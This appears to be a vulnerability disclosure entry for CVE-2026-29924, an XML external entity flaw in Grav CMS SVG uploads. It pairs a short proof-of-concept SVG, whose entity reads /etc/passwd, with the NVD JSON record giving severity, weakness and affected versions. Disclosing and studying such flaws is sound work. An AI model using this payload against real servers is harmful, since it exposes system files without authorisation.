CVE-2026-29924

<!-- XXE PoC for Grav CMS SVG Upload --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"> <text x="10" y="20" font-size="20">&xxe;</text> </svg>

{"cve": {"id": "CVE-2026-29924", "sourceIdentifier": "[email protected]", "published": "2026-03-30T19:16:24.470", "lastModified": "2026-04-06T15:58:27.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav CMS v1.7.x and before is vulnerable to XML External Entity (XXE) through the SVG file upload functionality in the admin panel and File Manager plugin."}, {"lang": "es", "value": "Grav CMS v1.7.x y anteriores es vulnerable a entidad externa XML (XXE) a través de la funcionalidad de carga de archivos SVG en el panel de administración y el plugin File Manager."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.0", "matchCriteriaId": "0F068841-DBCC-41D5-8B24-BFCE51841E2E"}]}]}], "references": [{"url": "https://github.com/getgrav/grav", "source": "[email protected]", "tags": ["Product"]}]}}